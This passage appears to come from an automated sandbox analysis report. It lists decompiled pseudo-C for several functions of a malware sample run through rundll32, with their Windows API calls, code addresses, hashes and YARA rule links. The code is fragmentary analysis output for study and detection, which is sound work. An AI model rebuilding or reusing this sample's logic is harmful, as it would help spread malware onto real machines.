							_t51 =  *0x4f4d32c; // 0x70795b0
							 *_t51 = 0x4f4e836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4f4d238, 0, 0x43);
							__eflags = _t36;
							 *0x4f4d2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4f4d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4f4d27c; // 0x212a5a8
								_t13 = _t58 + 0x4f4e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4f4c2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04F4269C( ~_v8 &  *0x4f4d270, 0x4f4d00c); // executed
								_t42 = E04F44094(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04F496A4(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04F46786(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E04F43DD9(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4f4d160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E04F4A501(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                                  0x04f4225b
                                                  0x04f42266
                                                  0x04f42269
                                                  0x04f4226c
                                                  0x04f4226f
                                                  0x04f42276
                                                  0x04f42278
                                                  0x04f42284
                                                  0x04f42286
                                                  0x04f42286
                                                  0x04f4228f
                                                  0x04f42297
                                                  0x04f4229a
                                                  0x04f422b4
                                                  0x04f422c0
                                                  0x04f422c2
                                                  0x04f422c7
                                                  0x04f422d1
                                                  0x04f422d1
                                                  0x04f422c9
                                                  0x04f422c9
                                                  0x04f422c9
                                                  0x04f422c9
                                                  0x04f422d8
                                                  0x04f422e5
                                                  0x04f422ec
                                                  0x04f422f1
                                                  0x04f422f1
                                                  0x04f422f9
                                                  0x04f422fc
                                                  0x04f42322
                                                  0x04f4232e
                                                  0x04f42333
                                                  0x04f42335
                                                  0x04f4233a
                                                  0x04f42366
                                                  0x04f42368
                                                  0x04f4233c
                                                  0x04f42340
                                                  0x04f42345
                                                  0x04f4234a
                                                  0x04f42351
                                                  0x04f42357
                                                  0x04f4235c
                                                  0x04f42362
                                                  0x04f42369
                                                  0x04f4236b
                                                  0x04f4236d
                                                  0x04f4237c
                                                  0x04f42382
                                                  0x04f42384
                                                  0x04f42389
                                                  0x04f423b9
                                                  0x04f423bb
                                                  0x04f4238b
                                                  0x04f4238b
                                                  0x04f42391
                                                  0x04f4239e
                                                  0x04f423a4
                                                  0x04f423a4
                                                  0x04f423ac
                                                  0x04f423b5
                                                  0x04f423bc
                                                  0x04f423be
                                                  0x04f423c0
                                                  0x04f423c7
                                                  0x04f423d4
                                                  0x04f423d9
                                                  0x04f423de
                                                  0x04f423e0
                                                  0x04f423e2
                                                  0x00000000
                                                  0x00000000
                                                  0x04f423e4
                                                  0x04f423e9
                                                  0x04f423eb
                                                  0x04f423f2
                                                  0x04f423f6
                                                  0x04f423f9
                                                  0x04f4240e
                                                  0x04f42412
                                                  0x04f42417
                                                  0x00000000
                                                  0x04f42417
                                                  0x04f423fb
                                                  0x04f423fd
                                                  0x00000000
                                                  0x00000000
                                                  0x04f42403
                                                  0x04f42408
                                                  0x04f4240a
                                                  0x04f4240c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4240c
                                                  0x04f423ef
                                                  0x04f423ef
                                                  0x04f423c0
                                                  0x04f422fe
                                                  0x04f422fe
                                                  0x04f42303
                                                  0x04f42419
                                                  0x04f4241d
                                                  0x04f42425
                                                  0x04f42425
                                                  0x00000000
                                                  0x04f4241d
                                                  0x04f42309
                                                  0x04f4230c
                                                  0x04f42316
                                                  0x04f4231d
                                                  0x00000000
                                                  0x04f4242d
                                                  0x04f4242d
                                                  0x04f42431
                                                  0x04f42435
                                                  0x04f42435

                                                  APIs
                                                    • Part of subcall function 04F4550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,04F42274,00000000,00000000), ref: 04F4551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04F422F1
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • memset.NTDLL ref: 04F42340
                                                  • RtlInitializeCriticalSection.NTDLL(07079570), ref: 04F42351
                                                    • Part of subcall function 04F43DD9: memset.NTDLL ref: 04F43DEE
                                                    • Part of subcall function 04F43DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04F43E22
                                                    • Part of subcall function 04F43DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 04F43E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04F4237C
                                                  • wsprintfA.USER32 ref: 04F423AC
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 9e73710df37c57f4f52c1614d42451a906916b52af368c92de1e442a509f49de
                                                  • Instruction ID: bd105692c20aa648ff41513ae3fbf9206ca728eb9fe02b6f5b0cbf9923a1b0e6
                                                  • Opcode Fuzzy Hash: 9e73710df37c57f4f52c1614d42451a906916b52af368c92de1e442a509f49de
                                                  • Instruction Fuzzy Hash: 6D51D575F00218ABEB209BA4EC48A6E3FB8EBC4784F0144B5F501D7141EF78EA468B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F494A9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 202 4f494a9-4f494bc 203 4f494c3-4f494c7 StrChrA 202->203 204 4f494be-4f494c2 203->204 205 4f494c9-4f494da call 4f42049 203->205 204->203 208 4f494dc-4f494e8 StrTrimA 205->208 209 4f4951f 205->209 210 4f494ea-4f494f3 StrChrA 208->210 211 4f49521-4f49528 209->211 212 4f49505-4f49511 210->212 213 4f494f5-4f494ff StrTrimA 210->213 212->210 214 4f49513-4f4951d 212->214 213->212 214->211
                                                  C-Code - Quality: 53%
                                                  			E04F494A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04F42049(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x4f4c2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x4f4c2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                  0x04f494b4
                                                  0x04f494b8
                                                  0x04f494ba
                                                  0x04f494bb
                                                  0x04f494c3
                                                  0x04f494c3
                                                  0x04f494c7
                                                  0x00000000
                                                  0x00000000
                                                  0x04f494be
                                                  0x04f494bf
                                                  0x04f494c2
                                                  0x04f494c2
                                                  0x04f494cf
                                                  0x04f494d6
                                                  0x04f494da
                                                  0x04f494e2
                                                  0x04f494e8
                                                  0x04f494ea
                                                  0x04f494ef
                                                  0x04f494f3
                                                  0x04f494f5
                                                  0x04f494f8
                                                  0x04f494ff
                                                  0x04f494ff
                                                  0x04f49509
                                                  0x04f4950c
                                                  0x04f4950f
                                                  0x04f4950f
                                                  0x04f4951b
                                                  0x04f4951b
                                                  0x04f49528

                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,070795AC,?,04F423DE,?,04F47634,070795AC,?,04F423DE), ref: 04F494C3
                                                  • StrTrimA.KERNELBASE(?,04F4C2A4,00000002,?,04F423DE,?,04F47634,070795AC,?,04F423DE), ref: 04F494E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,04F423DE,?,04F47634,070795AC,?,04F423DE), ref: 04F494ED
                                                  • StrTrimA.SHLWAPI(00000001,04F4C2A4,?,04F423DE,?,04F47634,070795AC,?,04F423DE), ref: 04F494FF
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: 68712fb1a75d3d05b5a07210ccafb900e28f737ba9ab89c15f3ca216a418e706
                                                  • Instruction ID: f787c99602af99cd367c4b57ce8a4d29bf6208677194088dab536c19dc674f68
                                                  • Opcode Fuzzy Hash: 68712fb1a75d3d05b5a07210ccafb900e28f737ba9ab89c15f3ca216a418e706
                                                  • Instruction Fuzzy Hash: 6F01B5B1B053255FD3319E69DC49F2B7ED8EBD6690F121519F841C7240DFA4D80286A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F43DD9, Relevance: 3.9, APIs: 3, Instructions: 155stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 90%
                                                  			E04F43DD9(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x4f4d27c; // 0x212a5a8
				_t5 = _t40 + 0x4f4ee40; // 0x410025
				_t85 = E04F46A12(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E04F49039(_v16);
					goto L24;
				}
				if(E04F4A72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E04F4809F(0,  *0x4f4d33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x4f4d27c; // 0x212a5a8
					_t11 = _t52 + 0x4f4e81a; // 0x65696c43
					_t55 = E04F4809F(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E04F46BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E04F49039(_t87);
					}
					if(_t80 != 0) {
						L17:
						E04F49039(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E04F41F99(_t86);
						}
						goto L22;
					} else {
						if(( *0x4f4d260 & 0x00000001) == 0) {
							L14:
							E04F48F83(_t80, _v88, _v84,  *0x4f4d270, 0);
							_t80 = E04F41C74(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E04F442EA( &_v40, 0);
							}
							E04F49039(_v88);
							goto L17;
						}
						_t67 =  *0x4f4d27c; // 0x212a5a8
						_t18 = _t67 + 0x4f4e823; // 0x65696c43
						_t70 = E04F4809F(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E04F46BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E04F49039(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}


























                                                  0x04f43deb
                                                  0x04f43dee
                                                  0x04f43df5
                                                  0x04f43dfb
                                                  0x04f43dfc
                                                  0x04f43dfd
                                                  0x04f43dfe
                                                  0x04f43dff
                                                  0x04f43e00
                                                  0x04f43e08
                                                  0x04f43e14
                                                  0x04f43e18
                                                  0x04f43e1b
                                                  0x04f43f6b
                                                  0x04f43f6e
                                                  0x04f43f72
                                                  0x04f43f72
                                                  0x04f43e2d
                                                  0x04f43e35
                                                  0x04f43f5e
                                                  0x04f43f5f
                                                  0x04f43f62
                                                  0x00000000
                                                  0x04f43f62
                                                  0x04f43e47
                                                  0x04f43e49
                                                  0x04f43e49
                                                  0x04f43e54
                                                  0x04f43e5b
                                                  0x04f43e5e
                                                  0x04f43f4d
                                                  0x00000000
                                                  0x04f43e64
                                                  0x04f43e64
                                                  0x04f43e69
                                                  0x04f43e72
                                                  0x04f43e77
                                                  0x04f43e80
                                                  0x04f43ea3
                                                  0x04f43e82
                                                  0x04f43e98
                                                  0x04f43e9a
                                                  0x04f43e9a
                                                  0x04f43ea6
                                                  0x04f43f41
                                                  0x04f43f44
                                                  0x04f43f4e
                                                  0x04f43f4e
                                                  0x04f43f53
                                                  0x04f43f55
                                                  0x04f43f55
                                                  0x00000000
                                                  0x04f43eac
                                                  0x04f43eb3
                                                  0x04f43ef4
                                                  0x04f43f05
                                                  0x04f43f1b
                                                  0x04f43f1f
                                                  0x04f43f24
                                                  0x04f43f2a
                                                  0x04f43f37
                                                  0x04f43f37
                                                  0x04f43f3c
                                                  0x00000000
                                                  0x04f43f3c
                                                  0x04f43eb5
                                                  0x04f43eba
                                                  0x04f43ec3
                                                  0x04f43ec8
                                                  0x04f43ecc
                                                  0x04f43eef
                                                  0x04f43ece
                                                  0x04f43ee4
                                                  0x04f43ee6
                                                  0x04f43ee6
                                                  0x04f43ef2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f43ef2
                                                  0x04f43ea6

                                                  APIs
                                                  • memset.NTDLL ref: 04F43DEE
                                                    • Part of subcall function 04F46A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04F43E14,00410025,00000005,?,00000000), ref: 04F46A23
                                                    • Part of subcall function 04F46A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04F46A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04F43E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 04F43E2D
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: 7601f74ae4d9a7b6b266c067a2cddea34b4d0ec845ea5d958b0a0d8e7f75aa94
                                                  • Instruction ID: 7ec6173e4a10c5113cc0c7ea6ee7cb13aa8fb80e5f6357ffba32a5a0526b7511
                                                  • Opcode Fuzzy Hash: 7601f74ae4d9a7b6b266c067a2cddea34b4d0ec845ea5d958b0a0d8e7f75aa94
                                                  • Instruction Fuzzy Hash: 34412276B01218AAEB21AFF4DC84DDE7FBCEF98754B004125E905E7110DE75EE468760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F48055, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 271 4f48055-4f48060 272 4f48085-4f48092 InterlockedDecrement 271->272 273 4f48062-4f48063 271->273 275 4f48099-4f4809c 272->275 276 4f48094 call 4f4970f 272->276 274 4f48065-4f48072 InterlockedIncrement 273->274 273->275 274->275 277 4f48074-4f48078 call 4f46a56 274->277 276->275 280 4f4807d-4f4807f 277->280 280->275 281 4f48081-4f48083 280->281 281->275
                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x4f4d23c) == 0) {
						E04F4970F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x4f4d23c) == 1) {
						_t10 = E04F46A56(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                  0x04f4805c
                                                  0x04f4805d
                                                  0x04f48060
                                                  0x04f48092
                                                  0x04f48094
                                                  0x04f48094
                                                  0x04f48062
                                                  0x04f48063
                                                  0x04f48078
                                                  0x04f4807f
                                                  0x04f48081
                                                  0x04f48081
                                                  0x04f4807f
                                                  0x04f48063
                                                  0x04f4809c

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(04F4D23C), ref: 04F4806A
                                                    • Part of subcall function 04F46A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04F4807D,?), ref: 04F46A69
                                                  • InterlockedDecrement.KERNEL32(04F4D23C), ref: 04F4808A
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: 3232565453e3a7ded23a080f61a50b37a6aef375f3ecc543621a861a6667459e
                                                  • Instruction ID: a2a0b38c9068cfeadf04ee54ef1c2b54bea3366d141052a0b606816b5a50d9e8
                                                  • Opcode Fuzzy Hash: 3232565453e3a7ded23a080f61a50b37a6aef375f3ecc543621a861a6667459e
                                                  • Instruction Fuzzy Hash: B9E0DF7D76026193A3323B7CAC04B1ABE00EBC1BC0F068010F684C0050CE10E8538AF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F473FD, Relevance: 2.6, APIs: 2, Instructions: 94memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 282 4f473fd-4f47410 call 4f4a72d 284 4f47415-4f47417 282->284 285 4f4741c-4f4743e call 4f41262 284->285 286 4f47419 284->286 289 4f47444-4f4745e 285->289 290 4f474fd-4f47502 285->290 286->285 295 4f47464-4f47480 call 4f47cb8 289->295 296 4f474ed-4f474ef 289->296 291 4f47504 call 4f41f99 290->291 292 4f47509-4f4750f 290->292 291->292 298 4f474f0-4f474fb HeapFree 295->298 300 4f47482-4f4749b call 4f489d6 295->300 296->298 298->290 303 4f474bd-4f474eb call 4f42659 HeapFree 300->303 304 4f4749d-4f474a4 300->304 303->298 304->303 305 4f474a6-4f474b8 call 4f489d6 304->305 305->303
                                                  C-Code - Quality: 87%
                                                  			E04F473FD(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04F4A72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4f4d27c; // 0x212a5a8
				_t4 = _t24 + 0x4f4ede0; // 0x7079388
				_t5 = _t24 + 0x4f4ed88; // 0x4f0053
				_t45 = E04F41262( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x4f4d0f4(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4f4d27c; // 0x212a5a8
						_t11 = _t32 + 0x4f4edd4; // 0x707937c
						_t48 = _t11;
						_t12 = _t32 + 0x4f4ed88; // 0x4f0053
						_t55 = E04F47CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x4f4d27c; // 0x212a5a8
							_t13 = _t35 + 0x4f4ee1e; // 0x30314549
							if(E04F489D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x4f4d25c - 6;
								if( *0x4f4d25c <= 6) {
									_t42 =  *0x4f4d27c; // 0x212a5a8
									_t15 = _t42 + 0x4f4ec2a; // 0x52384549
									E04F489D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x4f4d27c; // 0x212a5a8
							_t17 = _t38 + 0x4f4ee18; // 0x70793c0
							_t18 = _t38 + 0x4f4edf0; // 0x680043
							_t45 = E04F42659(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x4f4d238, 0, _t55);
						}
					}
					HeapFree( *0x4f4d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04F41F99(_t54);
				}
				return _t45;
			}
















                                                  0x04f473fd
                                                  0x04f4740d
                                                  0x04f47410
                                                  0x04f47417
                                                  0x04f47419
                                                  0x04f47419
                                                  0x04f4741c
                                                  0x04f47421
                                                  0x04f47428
                                                  0x04f4743a
                                                  0x04f4743e
                                                  0x04f4744c
                                                  0x04f4745a
                                                  0x04f4745e
                                                  0x04f474ef
                                                  0x04f474ef
                                                  0x04f47464
                                                  0x04f47464
                                                  0x04f47469
                                                  0x04f47469
                                                  0x04f47470
                                                  0x04f4747c
                                                  0x04f4747e
                                                  0x04f47480
                                                  0x04f47482
                                                  0x04f47489
                                                  0x04f4749b
                                                  0x04f4749d
                                                  0x04f474a4
                                                  0x04f474a6
                                                  0x04f474ad
                                                  0x04f474b8
                                                  0x04f474b8
                                                  0x04f474a4
                                                  0x04f474bd
                                                  0x04f474c2
                                                  0x04f474c9
                                                  0x04f474e7
                                                  0x04f474e9
                                                  0x04f474e9
                                                  0x04f47480
                                                  0x04f474fb
                                                  0x04f474fb
                                                  0x04f474fd
                                                  0x04f47502
                                                  0x04f47504
                                                  0x04f47504
                                                  0x04f4750f

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,070793C0,?,00000000,30314549,00000014,004F0053,0707937C), ref: 04F474E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F46814), ref: 04F474FB
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 469dda700d9f150dd76caa595d8ae3b850d6d0815f0331329eb89dc62e120c75
                                                  • Instruction ID: 14847bc738c9f8908e6ed724bc9114015bff9c7ced0ebaef2ae36253112097ad
                                                  • Opcode Fuzzy Hash: 469dda700d9f150dd76caa595d8ae3b850d6d0815f0331329eb89dc62e120c75
                                                  • Instruction Fuzzy Hash: C3316F76901108EFEB11EBA4EC44EAA7FFCEBD4744F154065E600A7160EF74AE46DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F421CD, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 309 4f421cd-4f421e0 call 4f484d5 311 4f421e5-4f421f3 call 4f412d4 309->311 314 4f421f5-4f42202 call 4f4809f 311->314 315 4f42222 311->315 320 4f42204-4f4220d 314->320 321 4f42211-4f4221c HeapFree 314->321 317 4f42224-4f4222d call 4f484d5 315->317 324 4f42252-4f42258 317->324 325 4f4222f-4f4223c 317->325 320->311 323 4f4220f 320->323 321->315 323->317 326 4f4224c 325->326 327 4f4223e-4f42242 325->327 329 4f4224f 326->329 327->326 328 4f42244-4f4224a 327->328 328->329 329->324
                                                  C-Code - Quality: 70%
                                                  			E04F421CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x4f4d330;
				E04F484D5();
				while(1) {
					_t8 = E04F412D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E04F4809F(_t14);
					if(_t15 == 0) {
						HeapFree( *0x4f4d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E04F484D5();
					if(_t19 != 0) {
						_t22 =  *0x4f4d338; // 0x7079b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                                  0x04f421d5
                                                  0x04f421d9
                                                  0x04f421da
                                                  0x04f421db
                                                  0x04f421e0
                                                  0x04f421e5
                                                  0x04f421ec
                                                  0x04f421f3
                                                  0x00000000
                                                  0x00000000
                                                  0x04f421f5
                                                  0x04f421fa
                                                  0x04f421fb
                                                  0x04f42202
                                                  0x04f4221c
                                                  0x00000000
                                                  0x04f42204
                                                  0x04f42204
                                                  0x04f42206
                                                  0x04f42209
                                                  0x04f4220d
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4220f
                                                  0x04f4220d
                                                  0x04f42224
                                                  0x04f42224
                                                  0x04f42226
                                                  0x04f4222d
                                                  0x04f4222f
                                                  0x04f42235
                                                  0x04f4223c
                                                  0x04f4224c
                                                  0x04f42244
                                                  0x04f42247
                                                  0x04f42247
                                                  0x04f4224f
                                                  0x04f4224f
                                                  0x04f42258
                                                  0x04f42258
                                                  0x04f42222
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 04F484D5: GetProcAddress.KERNEL32(36776F57,04F421E5), ref: 04F484F0
                                                    • Part of subcall function 04F412D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04F412FF
